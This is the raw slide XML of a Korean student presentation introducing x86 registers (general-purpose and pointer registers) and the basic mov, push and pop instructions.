              <a:t>    - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>레지스터는 크게 다섯가지로 분류할 수 있습니다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        - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>범용 레지스터</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>        - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>세그먼트 레지스터</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>        - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>포인터 레지스터</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>        - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>인덱스 레지스터</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>        - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>플래그 레지스터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 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 발표에서는 범용 레지스터와 포인터 레지스터에 대해서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>알아보겠습니다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7848807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20D662-D371-47A1-910C-E7E3DEF0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범용 레지스터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AC8A76-26F5-4EB1-8925-7AD6752A0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6854" y="1754660"/>
            <a:ext cx="6858000" cy="4813240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>범용 레지스터에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>비트 기준으로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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx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레지스터가 있습니다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각 레지스터는 어느 곳에서 사용되는지에 대한 용도가 각각 약속되어 있습니다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하지만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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>레지스터는 굳이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>일탈을 하고싶으시면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 다른 곳에 쓰고 싶으시다면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다른 용도로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용하셔도</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 무관하지만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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함수 호출이나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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시스템 콜 등의 약속된 곳에서는 약속을 꼭 지키셔야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" strike="sngStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>일탈하셨다간</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 큰일납니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" strike="sngStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>비트 시스템에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>bx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cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, dx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>라는 이름으로 불렸지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, 32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>비트 시스템으로 넘어오면서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>Extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>를 뜻하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>가 앞에 붙어서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>eax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ebx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ecx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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>가 되었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>또한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, 64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>비트 시스템으로 넘어오면서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, 64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>비트 시스템에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>Register</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>를 뜻하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>을 붙여서 사용합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>예 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>귵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rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>rdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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66388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 idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002275" y="1679850"/>
            <a:ext cx="6671399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200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3037"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Who am I?</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3037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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002275" y="3022650"/>
            <a:ext cx="6671399" cy="81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-KR" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3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김성훈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SHGroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ / ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" b="1" dirty="0"/>
              <a:t>’ )</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002275" y="3797025"/>
            <a:ext cx="6671399" cy="252464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Newbie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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Pwner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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하지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="18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Pwnable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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을 제일 못함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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sz="1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ko-KR" altLang="en-US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평범한 고등학생 개발자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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 언어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Java)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="타원 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249A8ADD-0629-4445-B531-AFF4312D8102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729762" y="3261946"/>
            <a:ext cx="360483" cy="360483"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3037"/>
          </a:solidFill>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="39C0B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782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20D662-D371-47A1-910C-E7E3DEF0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범용 레지스터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AC8A76-26F5-4EB1-8925-7AD6752A0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3762" y="1798620"/>
            <a:ext cx="6858000" cy="4813240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r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  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>누산기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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>곱셈과 나눗셈 연산에서 주로 사용합니다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ebx</a:t>
            </a:r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  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>특정 주소를 지정하는 베이스 레지스터입니다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ecx</a:t>
            </a:r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  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>반복문에서 반복 횟수를 셀 때 이용합니다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edx</a:t>
            </a:r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  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>입출력 연산에서 간접 주소 지정에 사용되는 데이터 레지스터입니다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  <a:endParaRPr lang="ko-KR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43734678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20D662-D371-47A1-910C-E7E3DEF0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포인터 레지스터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AC8A76-26F5-4EB1-8925-7AD6752A0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6854" y="1754660"/>
            <a:ext cx="6858000" cy="4813240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>범용 레지스터에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>비트 기준으로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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eip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레지스터가 있습니다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ebp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레지스터는 스택 프레임의 베이스를 가리키는 포인터입니다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esp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레지스터는 스택 프레임의 최상위를 가리키는 포인터입니다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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 스택의 구조를 보면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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다음과 같이 나타낼 수 있습니다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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                           &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r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                                           &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r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마지막으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eip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레지스터는 현재 처리중인 코드의 위치를 가리키는 포인터입니다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FF953CF0-4F47-43EB-9487-63D9186B0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746926"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3449515" y="3665418"/>
          <a:ext cx="313592" cy="185420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{EFE5B754-EBC9-4D97-A545-5280A1FC93EB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="313592">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1269307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08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184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17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016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765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46283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5EA1AE-5BDB-44C9-9490-AA2BB497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어셈블리 기본 명령어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43F112-9C86-4BF8-9B0C-8BE0945E1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97" y="1754660"/>
            <a:ext cx="7723526" cy="4813240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>사용법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> [destination] [source]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, 0x10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>처럼 사용합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.</a:t>
            </a:r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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>0x10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> 라고 생각하시면 쉽게 기억하실 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>. 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dirty="0"/>
              <a:t>2. push</a:t>
            </a:r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ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>사용법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>: push [source]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r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ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>현재 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>스택프레임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>의 피연산자를 넣고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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.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dirty="0"/>
              <a:t>3. pop</a:t>
            </a:r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ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>사용법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>: pop [destination]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>    </a:t>
            </a:r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ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>현재 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>스택프레임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>destination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>의 피연산자로 값을 옮기고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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>+4 </a:t>
            </a:r>
            <a:r>
